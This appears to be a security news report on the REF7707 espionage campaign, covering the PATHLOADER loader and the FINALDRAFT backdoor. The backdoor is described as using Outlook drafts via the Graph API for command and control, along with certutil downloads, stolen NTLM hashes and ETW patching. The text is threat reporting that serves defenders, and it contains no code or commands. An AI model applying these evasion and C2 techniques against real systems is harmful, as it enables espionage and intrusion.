Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts.
The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, both located in Southeast Asia.
“While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices,” security researchers Andrew Pease and Seth Goodwin said in a technical analysis.
The exact initial access vector used in the attacks is currently not clear, although it has been observed that Microsoft’s certutil application is used to download additional payloads from a web server associated with the Foreign Ministry.
The certutil commands used to retrieve the suspicious files have been found to be executed via the Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network.
“It indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,” the researchers noted.
The first of the files to be executed is a malware named PATHLOADER that allows for the execution of encrypted shellcode received from an external server. The extracted shellcode, dubbed FINALDRAFT, is subsequently injected into the memory of a newly-spawned “mspaint.exe” process.
Written in C++, FINALDRAFT is a full-featured remote administration tool that comes fitted with capabilities to execute additional modules on the fly and abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. It’s worth noting that the abuse of the Graph API has been previously detected in another backdoor named SIESTAGRAPH.
The communication mechanism entails parsing the commands stored in the mailbox’s drafts folder and writing the results of the execution into new draft emails for each command. FINALDRAFT registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.
It’s also engineered to start new processes with stolen NTLM hashes and execute PowerShell commands in a manner such that it does not invoke the “powershell.exe” binary. Instead, it patches several APIs to evade event tracing for Windows (ETW) and launches PowerPick, a legitimate utility that’s part of the Empire post-exploitation toolkit.
ELF binary artifacts uploaded to VirusTotal from Brazil and the United States indicate the presence of a Linux variant of FINALDRAFT that features similar C2 functionality. The Linux version, for its part, can execute shell commands via popen and delete itself from the system.
“The completeness of the tools and the level of engineering involved suggest that the developers are well-organized,” the researchers said. “The extended time frame of the operation and evidence from our telemetry suggest it’s likely an espionage-oriented campaign.”
